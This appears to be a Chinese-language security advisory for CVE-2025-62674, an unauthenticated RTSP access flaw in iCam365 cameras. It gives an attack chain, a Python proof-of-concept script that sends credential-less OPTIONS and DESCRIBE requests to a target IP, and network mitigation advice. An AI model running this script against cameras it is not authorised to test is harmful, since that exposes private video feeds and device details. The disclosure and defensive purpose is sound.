CVE-2025-62674 iCam365摄像头RTSP服务未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-62674

漏洞类型

未授权访问

CVSS评分

6.8 中危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

iCam365摄像头及相关产品

漏洞概述

CVE-2025-62674是一个影响摄像头设备的安全漏洞，攻击者可以通过该漏洞对受影响的RTSP（实时流协议）服务进行未认证访问。RTSP是一种广泛应用于视频监控系统的协议，用于控制音频和视频流的传输。漏洞源于系统未对RTSP服务实施充分的身份验证机制，导致任何具有网络访问权限的攻击者都可以直接连接到RTSP端口并获取视频流或配置信息。该漏洞的CVSS评分为6.8，属于中等严重程度，主要风险在于机密性影响较高（可获取摄像头配置信息），而完整性和可用性影响较低。由于攻击向量为邻接网络（AV:A），意味着攻击者需要在本地网络环境中才能利用此漏洞，这限制了其潜在影响范围。对于部署了大量网络摄像头的企业环境，该漏洞可能导致敏感监控区域的信息泄露，对物理安全和隐私保护构成威胁。

技术细节

该漏洞的核心问题在于RTSP服务的认证机制缺失。RTSP协议本身支持多种认证方式，包括Basic认证和Digest认证，但受影响的设备未正确实现这些认证机制。攻击者可以通过标准RTSP客户端工具（如VLC media player、ffmpeg或专门的安全测试工具）直接连接到摄像头的RTSP端口（通常为554端口），无需提供任何凭据即可获取视频流或配置信息。技术层面，攻击者发送DESCRIBE、SETUP和PLAY等RTSP方法请求时，服务器直接响应而不验证客户端身份。响应中包含SDP（会话描述协议）信息，暴露了流的详细信息，包括编码格式、分辨率等。进一步利用可获取摄像头配置信息，如设备型号、固件版本、网络设置等敏感数据。这种未授权访问不仅违反隐私原则，还可能被用于收集情报或策划物理入侵。

攻击链分析

STEP 1

步骤1: 网络侦察

攻击者对目标网络进行扫描，发现开放554端口（RTSP）的摄像头设备

STEP 2

步骤2: RTSP服务识别

使用RTSP客户端工具或nmap脚本识别目标设备支持的RTSP方法（OPTIONS、DESCRIBE等）

STEP 3

步骤3: 未授权访问尝试

直接发送RTSP DESCRIBE请求，无需提供任何认证凭据，服务器直接响应并返回SDP信息

STEP 4

步骤4: 获取视频流

通过SETUP和PLAY方法建立RTSP会话，获取实时视频流或配置信息

STEP 5

步骤5: 信息收集与利用

收集摄像头配置信息、设备型号、固件版本等敏感数据，用于进一步攻击或情报收集

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

def rtsp_unauthorized_access(target_ip, port=554):
    """
    CVE-2025-62674 PoC - RTSP Unauthenticated Access
    This script demonstrates unauthorized access to RTSP service
    """
    try:
        # RTSP OPTIONS request without authentication
        options_request = f'OPTIONS rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        options_request += f'CSeq: 1\r\n'
        options_request += '\r\n'
        
        # RTSP DESCRIBE request without authentication
        describe_request = f'DESCRIBE rtsp://{target_ip}:{port}/stream1 RTSP/1.0\r\n'
        describe_request += f'CSeq: 2\r\n'
        describe_request += 'Accept: application/sdp\r\n'
        describe_request += '\r\n'
        
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, port))
        
        print(f'[*] Sending OPTIONS request to {target_ip}:{port}')
        sock.send(options_request.encode())
        response1 = sock.recv(4096).decode('utf-8', errors='ignore')
        print(f'[*] OPTIONS Response:\n{response1}')
        
        print(f'[*] Sending DESCRIBE request to {target_ip}:{port}')
        sock.send(describe_request.encode())
        response2 = sock.recv(8192).decode('utf-8', errors='ignore')
        print(f'[*] DESCRIBE Response:\n{response2}')
        
        # Check if authentication is required
        if '401' not in response2 and 'Unauthorized' not in response2:
            print('[!] VULNERABLE: RTSP service allows unauthenticated access!')
            return True
        else:
            print('[*] NOT VULNERABLE: Authentication is required')
            return False
            
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False
    finally:
        sock.close()

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
        rtsp_unauthorized_access(target, port)
    else:
        print('Usage: python cve-2025-62674.py <target_ip> [port]')

影响范围

iCam365及相关摄像头产品（具体版本需参考厂商官方公告）

防御指南

临时缓解措施

在边界防火墙上实施访问控制策略，禁止未经授权的RTSP端口（554）访问；对于必须暴露的摄像头设备，启用RTSP Digest认证并使用强密码；建议将摄像头部署在独立的VLAN中，实施网络分段；如暂时无法安装补丁，可使用VPN或IP白名单机制限制访问来源。